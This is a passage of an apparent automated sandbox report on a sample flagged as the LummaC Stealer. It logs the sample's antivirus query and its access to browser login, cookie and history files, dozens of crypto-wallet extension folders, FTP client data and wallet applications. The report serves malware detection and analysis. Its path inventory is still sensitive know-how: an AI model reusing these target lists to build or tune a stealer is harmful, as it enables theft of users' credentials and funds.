          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923610742.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: Process Memory Space: nvtoaldlrg.exe PID: 7128, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.nvtoaldlrg.exe.ac0000.0.unpack, type: UNPACKEDPE
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%F
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":8
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodusD
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodusD
          Source: nvtoaldlrg.exe, 00000000.00000003.921858866.00000000014D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"W
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: nvtoaldlrg.exe, 00000000.00000003.921858866.00000000014D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"W
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
